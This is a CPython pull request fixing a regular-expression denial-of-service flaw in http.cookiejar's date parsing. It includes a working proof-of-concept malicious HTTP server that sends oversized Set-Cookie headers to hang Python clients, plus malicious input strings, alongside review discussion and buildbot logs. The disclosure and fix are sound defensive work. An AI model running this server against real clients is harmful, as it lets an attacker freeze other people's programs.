
bpo-38804: Fix REDoS in http.cookiejar #17157

Merged
merged 6 commits on Nov 22, 2019

Conversation

@bcaller
Contributor

bcaller commented Nov 14, 2019

The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).
LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups, the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.
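The blow-up is easy to reproduce with a simplified stand-in for the vulnerable pattern (both regexes below are illustrative only -- the real LOOSE_HTTP_DATE_RE and the actual fix are more involved):

```python
import re
import time

# Stand-in for the vulnerable pattern: three ambiguous, overlapping \s*
# groups competing for the same run of spaces before the anchor.
AMBIGUOUS = re.compile(r"\d+-\w+-\d+(\s*)(\s*)(\s*)$")
# Unambiguous variant: any run of spaces can only be matched one way.
UNAMBIGUOUS = re.compile(r"\d+-\w+-\d+(\s*)$")

def match_time(pattern, n_spaces):
    # Trailing "!" guarantees the overall match fails, forcing backtracking.
    s = "1-c-1" + " " * n_spaces + "!"
    start = time.perf_counter()
    assert pattern.match(s) is None
    return time.perf_counter() - start

# The ambiguous pattern retries every split of the spaces between its three
# groups before giving up; the unambiguous one fails after a single pass.
slow = match_time(AMBIGUOUS, 250)
fast = match_time(UNAMBIGUOUS, 250)
```

Even at 250 spaces the ambiguous variant is typically orders of magnitude slower; at 65506 spaces it effectively never returns.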

You can create a malicious server which responds with Set-Cookie headers
to attack all Python programs which access it, e.g.:

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

https://bugs.python.org/issue38804

@the-knights-who-say-ni


the-knights-who-say-ni commented Nov 14, 2019

Hello, and thanks for your contribution!

I'm a bot set up to make sure that the project can legally accept this contribution by verifying everyone involved has signed the PSF contributor agreement (CLA).

CLA Missing

Our records indicate the following people have not signed the CLA:

@bcaller

For legal reasons we need all the people listed to sign the CLA before we can look at your contribution. Please follow the steps outlined in the CPython devguide to rectify this issue.

If you have recently signed the CLA, please wait at least one business day
before our records are updated.

You can check yourself to see if the CLA has been received.

Thanks again for the contribution, we look forward to reviewing it!

@brandtbucher

Member

brandtbucher commented Nov 15, 2019

Thanks for your time @bcaller, and welcome to CPython!

I assume that you've seen the bot's message about the CLA?

@bcaller

Contributor Author

bcaller commented Nov 15, 2019

Yes @brandtbucher, I just signed it.

Member

brandtbucher left a comment

This PR should also have a NEWS entry. Something like:

    Fixes a ReDoS vulnerability in :class:`http.cookiejar.CookieJar`.
Member

brandtbucher left a comment

Thanks @bcaller, this looks good to me now. I’m not an expert on this code though, so we’ll need to find somebody who is.

Member

serhiy-storchaka left a comment

LGTM. There is the same problem with ISO_DATE_RE. Do you mind fixing it too?

It would be nice to add tests (if possible) -- some examples which take more than an hour with unpatched code and just a fraction of a second with patched code.

@bcaller

Contributor Author

bcaller commented Nov 15, 2019

ISO_DATE_RE only has 2 overlapping \s*s (compared to 3), so it isn't catastrophic.
Also, it is only used when loading LWPCookieJar files, so just processing an HTTP response won't cause a DoS.
That said, it is a little inefficient in the case where an LWPCookieJar file has been tampered with, so it could be fixed in the same way.

I was thinking about the test, but how do I make a test which is reliable, regardless of CPU power and other processes running on the machine? I could make a test which measures the time for successively longer strings and asserts the performance is sub-quadratic?

@serhiy-storchaka

Member

serhiy-storchaka commented Nov 15, 2019

I think it is enough to use an example that takes a long time (an hour or a few hours). It will not pass unnoticed.

@bcaller

Contributor Author

bcaller commented Nov 15, 2019

I wrote an overcomplicated test

    def test_http2time_redos_regression(self):
        def run_timer(n_spaces):
            return timeit.timeit(
                stmt="http2time(expires)",
                number=5,
                globals=dict(
                    http2time=http2time,
                    expires="1-c-1{}!".format(' ' * n_spaces),
                ),
            )
        base_n_spaces = 500
        factor = 2  # Length of backtracking sequence is increased by this factor
        long_time = run_timer(base_n_spaces * factor)
        short_time = run_timer(base_n_spaces)
        self.assertLess(
            long_time / short_time,  # Execution time increased by this factor
            factor ** 1.2,  # Expected to be approximately equal, but we can have some leeway
            "Performance of http2time is significantly worse than linear",
        )

but I think I'll just do what you said instead.

@bcaller bcaller force-pushed the bcaller:bc-http-cookiejar-redos branch from 27ce2fd to 60de955 Nov 15, 2019
    def test_http2time_redos_regression_actually_completes(self):
        # LOOSE_HTTP_DATE_RE was vulnerable to malicious input which caused
        # catastrophic backtracking (REDoS). If we regress, this test will
        # take a very long time to succeed.
        http2time("1-c-1{}!".format(" " * 65506))

@vstinner

vstinner Nov 15, 2019

Member

Would it be possible to use time.perf_counter() to detect if the function takes way too long? For example, test with 1 space, then test with 65K spaces, and check that the second test is not something like 1000x slower?

In general, I dislike tests which rely on time, since they are likely to fail on our slowest buildbot. But I don't suggest to use hardcoded timing, only to compare timings of two function calls. It may work on buildbot, especially if the threshold is large enough (1000x slower? more?).

cc @pablogsal
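The timing-comparison idea could be sketched as follows (a hypothetical test, not the one merged in this PR; the threshold constants are arbitrary):

```python
import time
from http.cookiejar import http2time

def elapsed(n_spaces):
    # Malicious Expires value: a parseable-looking prefix, a long run of
    # spaces, then a character that forces the date regex to fail.
    start = time.perf_counter()
    http2time("1-c-1" + " " * n_spaces + "!")
    return time.perf_counter() - start

# With the fixed regex, even the longest value that fits in a 65536-byte
# header line completes almost instantly; before the fix it effectively
# hangs, so a very generous threshold still catches a regression.
assert elapsed(65506) < elapsed(1) * 1000 + 2.0
```

Comparing two measurements of the same function, with slack, avoids hard-coding an absolute limit that slow buildbots could miss.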

@serhiy-storchaka

serhiy-storchaka Nov 15, 2019

Member

With the fixed regex the test should take a fraction of second.

@bcaller

bcaller Nov 15, 2019

Author Contributor

@vstinner Do you mean something like the above #17157 (comment) ?
The issue here is whether we really should have a unit test for algorithmic complexity of a function at all and what it should look like. Do we do that anywhere else?
I agree that having the one-line test which never explicitly fails is a bit weird.

Member

serhiy-storchaka left a comment

http2time() has cubic complexity, iso2time() has quadratic complexity.
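These complexities are consistent with a simple counting argument (a sketch, not from the PR): n spaces can be split among k adjacent \s* groups in C(n+k-1, k-1) ways ("stars and bars"), so the engine explores O(n^2) partitions for the three groups in LOOSE_HTTP_DATE_RE and O(n) for the two in ISO_DATE_RE; with roughly linear work per failed attempt, that matches cubic and quadratic overall behaviour.

```python
from math import comb

def partitions(n_spaces, n_groups):
    # Ways to split n_spaces spaces among n_groups adjacent \s* groups:
    # the "stars and bars" count C(n + k - 1, k - 1).
    return comb(n_spaces + n_groups - 1, n_groups - 1)

# Three overlapping groups (LOOSE_HTTP_DATE_RE): quadratic partition count.
assert partitions(10, 3) == 66
# Doubling the spaces roughly quadruples the partitions for k=3 ...
assert 3.9 < partitions(2000, 3) / partitions(1000, 3) < 4.1
# ... and roughly doubles them for k=2 (ISO_DATE_RE).
assert 1.9 < partitions(2000, 2) / partitions(1000, 2) < 2.1
```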


@bcaller bcaller force-pushed the bcaller:bc-http-cookiejar-redos branch from 60de955 to 2ea754f Nov 15, 2019
bcaller added 2 commits Nov 15, 2019
* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

    "444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
@bcaller bcaller force-pushed the bcaller:bc-http-cookiejar-redos branch from 2ea754f to e11dfbe Nov 15, 2019
Member

serhiy-storchaka left a comment

Great! I see this is your first contribution. Would you mind also adding your name to Misc/ACKS?

@miss-islington


miss-islington commented Nov 22, 2019

Thanks @bcaller for the PR, and @vstinner for merging it 🌮🎉. I'm working now to backport this PR to: 3.8.
🐍🍒🤖

miss-islington added a commit to miss-islington/cpython that referenced this pull request Nov 22, 2019
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
@bedevere-bot


bedevere-bot commented Nov 22, 2019

GH-17341 is a backport of this pull request to the 3.8 branch.

@miss-islington


miss-islington commented Nov 22, 2019

Thanks @bcaller for the PR, and @vstinner for merging it 🌮🎉. I'm working now to backport this PR to: 3.7.
🐍🍒🤖

@bedevere-bot


bedevere-bot commented Nov 22, 2019

GH-17342 is a backport of this pull request to the 3.7 branch.

miss-islington added a commit to miss-islington/cpython that referenced this pull request Nov 22, 2019
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
@miss-islington


miss-islington commented Nov 22, 2019

Thanks @bcaller for the PR, and @vstinner for merging it 🌮🎉. I'm working now to backport this PR to: 3.6.
🐍🍒🤖 I'm not a witch! I'm not a witch!

@bedevere-bot


bedevere-bot commented Nov 22, 2019

GH-17343 is a backport of this pull request to the 3.6 branch.

miss-islington added a commit to miss-islington/cpython that referenced this pull request Nov 22, 2019
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
vstinner added a commit to vstinner/cpython that referenced this pull request Nov 22, 2019

(cherry picked from commit 1b779bf)
vstinner added a commit to vstinner/cpython that referenced this pull request Nov 22, 2019

(cherry picked from commit 1b779bf)
vstinner added a commit to vstinner/cpython that referenced this pull request Nov 22, 2019

(cherry picked from commit 1b779bf)
@vstinner

Member

vstinner commented Nov 22, 2019

What happens now?

I merged your PR, thanks. I'm OK with skipping the automated test that measures the maximum time.

I backported the fix to all supported Python branches: 2.7, 3.5, 3.6, 3.7 and 3.8.

@brandtbucher

Member

brandtbucher commented Nov 22, 2019

Congrats on your first CPython contribution @bcaller! 🍾

Looking forward to seeing more from you in the future.

miss-islington added a commit that referenced this pull request Nov 22, 2019
miss-islington added a commit that referenced this pull request Nov 22, 2019
ned-deily added a commit that referenced this pull request Nov 22, 2019
vstinner added a commit that referenced this pull request Nov 24, 2019
bedevere-bot commented Nov 24, 2019

⚠️⚠️⚠️ Buildbot failure ⚠️⚠️⚠️

Hi! The buildbot AMD64 FreeBSD Shared 2.7 has failed when building commit e649903.

What do you need to do:

  1. Don't panic.
  2. Check the buildbot page in the devguide if you don't know what the buildbots are or how they work.
  3. Go to the page of the buildbot that failed (https://buildbot.python.org/all/#builders/366/builds/8) and take a look at the build logs.
  4. Check if the failure is related to this commit (e649903) or if it is a false positive.
  5. If the failure is related to this commit, please, reflect that on the issue and make a new Pull Request with a fix.

You can take a look at the buildbot page here:

https://buildbot.python.org/all/#builders/366/builds/8

Failed tests:

  • test_ssl

Failed subtests:

  • test_load_cert_chain - test.test_ssl.ContextTests

Summary of the results of the build (if available):

== Tests result: FAILURE then FAILURE ==

368 tests OK.

10 slowest tests:

  • test_lib2to3: 198.9s
  • test_io: 195.0s
  • test_tokenize: 144.3s
  • test_regrtest: 139.3s
  • test_decimal: 129.4s
  • test_itertools: 110.4s
  • test_multiprocessing: 77.4s
  • test_subprocess: 76.2s
  • test_file2k: 45.5s
  • test_weakref: 43.2s

1 test failed:
test_ssl

35 tests skipped:
test_aepack test_al test_applesingle test_bsddb test_bsddb3
test_cd test_cl test_dl test_epoll test_gdb test_gdbm test_gl
test_idle test_imageop test_imgfile test_ioctl test_linuxaudiodev
test_macos test_macostools test_msilib test_ossaudiodev
test_pep277 test_scriptpackages test_spwd test_startfile
test_sunaudiodev test_tcl test_tk test_ttk_guionly
test_ttk_textonly test_turtle test_unicode_file test_winreg
test_winsound test_zipfile64
Ask someone to teach regrtest.py about which tests are
expected to get skipped on freebsd13.

1 re-run test:
test_ssl

Total duration: 11 min 47 sec

Traceback logs:
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/local/lib/python2.7/test/test_support.py", line 2, in <module>
    import test.support
  File "/usr/local/lib/python2.7/test/support/__init__.py", line 6, in <module>
    import contextlib
  File "/usr/local/lib/python2.7/contextlib.py", line 4, in <module>
    from functools import wraps
  File "/usr/local/lib/python2.7/functools.py", line 10, in <module>
    from _functools import partial, reduce
ImportError: /usr/local/lib/python2.7/lib-dynload/_functools.so: Undefined symbol "Py_InitModule4_64"


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 189, in f
    return func(*args, **kwargs)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2402, in test_protocol_sslv23
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2134, in try_protocol_combo
    chatty=False, connectionchatty=False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2062, in server_params_test
    s.connect((HOST, server.port))
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 864, in connect
    self._real_connect(addr, False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 855, in _real_connect
    self.do_handshake()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
SSLError: [SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1 alert protocol version (_ssl.c:727)


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1810, in run
    msg = self.read()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1787, in read
    return self.sslconn.read()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 641, in read
    v = self._sslobj.read(len)
error: [Errno 54] Connection reset by peer


Traceback (most recent call last):
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1730, in wrap_conn
    self.sock, server_side=True)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 369, in wrap_socket
    _context=self)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 599, in __init__
    self.do_handshake()
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
 SSLError: [SSL: TLSV1_ALERT_UNKNOWN_CA] tlsv1 alert unknown ca (_ssl.c:727)
 server:  new connection from ('127.0.0.1', 35632)
 server: connection cipher is now ('ECDHE-RSA-AES256-SHA', 'TLSv1.0', 256)
 server: selected protocol is now None
k


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 920, in test_load_cert_chain
    ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
SSLError: [SSL] PEM lib (_ssl.c:2834)


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 189, in f
    return func(*args, **kwargs)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2477, in test_protocol_tlsv1_1
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2134, in try_protocol_combo
    chatty=False, connectionchatty=False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2062, in server_params_test
    s.connect((HOST, server.port))
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 864, in connect
    self._real_connect(addr, False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 855, in _real_connect
    self.do_handshake()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
SSLError: [SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1 alert protocol version (_ssl.c:727)


Traceback (most recent call last):
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1730, in wrap_conn
    self.sock, server_side=True)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 369, in wrap_socket
    _context=self)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 599, in __init__
    self.do_handshake()
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
 SSLError: [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:727)
k
bedevere-bot commented Nov 25, 2019

⚠️⚠️⚠️ Buildbot failure ⚠️⚠️⚠️

Hi! The buildbot AMD64 FreeBSD Shared 2.7 has failed again when building commit e649903.

You can take a look at the buildbot page here:

https://buildbot.python.org/all/#builders/366/builds/9

Failed tests:

  • test_ssl

Failed subtests:

  • test_load_cert_chain - test.test_ssl.ContextTests

Summary of the results of the build (if available):

== Tests result: FAILURE then FAILURE ==

368 tests OK. 1 test failed: test_ssl (re-run once). 35 tests skipped.

Total duration: 14 min 13 sec
jacobneiltaylor added a commit to jacobneiltaylor/cpython that referenced this pull request Dec 5, 2019
shihai1991 added a commit to shihai1991/cpython that referenced this pull request Jan 31, 2020